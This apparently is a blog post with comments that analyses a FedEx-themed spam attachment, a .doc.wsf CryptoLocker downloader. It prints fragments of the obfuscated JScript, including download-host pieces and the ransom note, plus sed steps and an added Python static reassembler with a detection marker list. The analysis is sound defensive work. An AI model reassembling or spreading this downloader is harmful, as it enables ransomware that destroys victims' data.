Why Friends Don’t Let Friends Run Windows: Cryptolocker Downloader

Got an email, nominally from one Richard Gilmore of FedEx, concerning a parcel sent as International Next Flight (whatever that is). The Subject line read “We could not deliver your parcel, #00000665103”, although the message didn’t quite match:

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Kind regards,
Richard Gilmore,
Sr. Delivery Agent.

The email address had nothing to do with FedEx, of course, and my filters tagged it as spam.

The “label” came in a ZIP file:

Extracting the “label” produced what would look like an MS Word file, if you were so trusting as to hide extensions of “known” filetypes and didn’t worry when you saw a file still sporting a DOC extension: Label_00000665103.doc.wsf

Handing that to VirusTotal produces no surprise at all:

VirusTotal Report

The file contains one very long line, the first chunk of which suggests it’s up to no good:

<job><script language=JScript>var a59253 = '+"HKCU"+cs'; var a59168 = '"); fp.WriteLine(" '; var a5988 = ';} else if('; var a59196 = 'gth;i'; var a59160 = 'fp.W'; var a59261 = 'ion"+c'; var a5999 = 's(f'; var a59254 = '+"SOFTWARE"+';

After a bit of poking, I applied a few minutes of sed reformatting, manual cleanup, and sorting:

sed 's/; var a/;\n/g' Label_00000665103.doc.wsf > lines.txt
... fix a few lines ...
sort -n lines.txt > sort.txt

Which produced a file starting out like this:

<job><script language=JScript>
590 = 'var id="TRIB9RMvAFl04U4Fi7L6RNk9ZowJ2sj_fIrO0WiXGlXd53j6oENCCFDZ9NbVubN-vvJltoR8Wf4_";d';
591 = '="1vcs62wsoYZNc4TdwqgsG5965bDt3mNYW"; var bc="0.52';
592 = '189"; var ld=0;';
593 = ' var cq';
594 = '=S';
595 = 'tri';
596 = 'ng.f';
597 = 'romCharCode(34);';
598 = ' var cs';
599 = '=Strin';
5910 = 'g.fromCh';
5911 = 'ar';
5912 = 'Code(92); var ll';
5913 = '=["","v';
5914 = 'iktoriascho';
5915 = '","blende';
5916 = '';
5917 = '","pasargad1007.c';
5918 = 'om","www.unit';
5919 = '"';
5920 = ']; v';
5921 = 'ar ';
5922 = 'ws=WScript.Cre';
5923 = 'ateObject(';
5924 = '"WScript.Shell';
5925 = '"); v';
5926 = 'ar';
5927 = ' fn=ws';
5928 = '.Expa';
5929 = 'ndEnv';
5930 = 'ironme';
5931 = 'ntString';
... snippage ...

Even without pasting the fragments back together, you can puzzle out the punchline:

59108 = 't",true); fp.Write';
59109 = 'Line("ATTEN';
59110 = 'TION!"); fp.Wr';
59111 = 'ite';
59112 = 'Line(';
59113 = '""); fp.W';
59114 = 'riteLine("All';
59115 = ' your d';
59116 = 'ocuments, p';
59117 = 'hotos';
59118 = ', databases and ot';
59119 = 'her import';
59120 = 'ant ';
59121 = 'pers';
59122 = 'onal fil';
59123 = 'es"); fp.';
59124 = 'Wri';
59125 = 'te';
59126 = 'Line(';
59127 = '"were e';
59128 = 'ncrypted usi';
59129 = 'ng strong RSA-1024';
59130 = ' algorithm with ';
59131 = 'a uniqu';
59132 = 'e key."); fp.Write';
59133 = 'Line(';
59134 = '"To restor';
59135 = 'e your files you h';
59136 = 'ave to pay "+bc+" ';
59137 = 'BTC (bitcoin';
59138 = 's)."); fp.Wri';

Huh. CryptoLocker returns from the dead! Right now, 0.52 BTC = $316.15, so I guess I can drop that into the jar of money saved by running Linux.
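
Pasting the fragments back together can be done statically, without ever running the script. The Python below is an added example, not code from the original post: it parses the `var aNNN = '...'` assignments, joins them in numeric name order (an assumption that mirrors the `sort -n` step above), and shows that a string split across fragments only becomes searchable after reassembly. The sample line is constructed from ten fragments in the listing; the shuffled order and the `MARKERS` list are illustrative.

```python
import re

# Constructed sample: ten fragments copied from the sorted listing above,
# placed in a made-up shuffled order on one line, as in the .wsf file.
SAMPLE = (
    "<job><script language=JScript>"
    "var a5911 = 'ar'; var a594 = '=S'; var a5912 = 'Code(92); var ll'; "
    "var a597 = 'romCharCode(34);'; var a593 = ' var cq'; var a599 = '=Strin'; "
    "var a596 = 'ng.f'; var a5910 = 'g.fromCh'; var a598 = ' var cs'; "
    "var a595 = 'tri';"
)

# One assignment: var a<digits> = '<fragment>';  (backslash escapes kept verbatim)
FRAGMENT = re.compile(r"var\s+a(\d+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;")

# Strings a content scanner might look for; chosen here for illustration only.
MARKERS = ("WScript.Shell", "String.fromCharCode",
           "ExpandEnvironmentStrings", "fp.WriteLine")


def extract_fragments(text):
    """Return {numeric name: fragment} without evaluating any script code."""
    frags = {}
    for m in FRAGMENT.finditer(text):
        index = int(m.group(1))
        if index in frags:
            raise ValueError(f"duplicate fragment a{index}")
        frags[index] = m.group(2)
    return frags


def reassemble(text):
    """Join fragments in numeric name order (assumed, as `sort -n` does above)."""
    frags = extract_fragments(text)
    # int keys matter: a plain string sort would put a5910 ahead of a593.
    return "".join(frags[i] for i in sorted(frags))


def markers_found(text):
    """List the marker strings that occur contiguously in text."""
    return [m for m in MARKERS if m in text]


if __name__ == "__main__":
    rebuilt = reassemble(SAMPLE)
    print("raw file matches:    ", markers_found(SAMPLE))
    print("rebuilt text matches:", markers_found(rebuilt))
    print(rebuilt)
```

To use it on a saved attachment, pass the file's text to `reassemble()`; the file is only read as text and nothing in it is executed.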

If those emails didn’t work so well, they wouldn’t send them…

  1. #1 by scruss2 on 2016-09-29 - 10:58

    Yep. The good folks at Papertrail Paperworks and press were hit by this while I was taking a course with them. All of their reference documents and teaching materials are effectively gone. So is the source code they’re working on for a microcontroller driver for their Monotype Caster, a metal type caster that’s a delightful mix of hydraulics, electro-pneumatics and molten lead …

    • #2 by Red County Pete on 2016-09-29 - 11:09

      FWIW, I have two USB backup drives, and swap them weekly. If I get encrypted, I can get week-old data onto a clean machine. Seems like pretty cheap insurance to me.

      “Blessed are the pessimists, for they have made backups.”

    • #3 by Ed on 2016-09-30 - 12:08

      On the positive side of the ledger, now they have a really great backup strategy. Right? [sigh]

  2. #4 by Red County Pete on 2016-09-29 - 11:04

    I’m lucky, spam shows up maybe once every month or so, though having a quiet email presence helps. [grin] Usually, I’ll trash it without opening, to avoid autorun html crap. On very rare occasions, it’s some gubbage from a family member.

    With MalwareSoft’s Windows 7 update policies starting in October, I’ll keep one laptop on Win 7, but will disable WiFi internet access, either by fiddling with the router permissions or disabling WiFi altogether. That will be the Quicken/tax/business machine. When the kitchen rebuilding festivities end (Thanksgiving-ish–got a much better price for cabinets and counters than we expected), I’ll get a refurbished laptop and set up a Linux distro (Slack, I think) on it. If KMyMoney works out, I’ll deprecate Quicken. After that, I’ll convert the desktop machine, though I want to see if I can get Turbocad to run under Wine.

    The AskWoody dot com site has lots of information on the update stuff for Windows users…

    (Rumor has it some of the encryptors don’t bother to send a decryption key after they get the money. Color me shocked.)

    • #5 by Ed on 2016-09-30 - 12:06

      My main email goes through and their spam filters work wonderfully well. Relatively few false positives, mostly for messages from known-good organizations sending bleating requests for donations.

      “some of the encryptors don’t bother to send a decryption key after they get the money”

      Talk about poisoning the well: that destroys the trust you’re supposed to have in a criminal. Eventually, nobody will even attempt to pay the ransom!

  3. #6 by eriklscott on 2016-09-29 - 12:13

    What I find worrisome is the 24/55 virus scoring. I’m not slamming on any one product, but I would have felt a lot better if that was, say, 53/55. Sigh. But we should be careful with our advice – if Linux gets more popular to attack then the cognoscenti will have to move to OpenBSD.

    • #7 by Ed on 2016-09-30 - 12:00

      I think the overall score has more to do with when the signature databases get updated than anything else: plotting score vs. time for a specific file would be interesting.

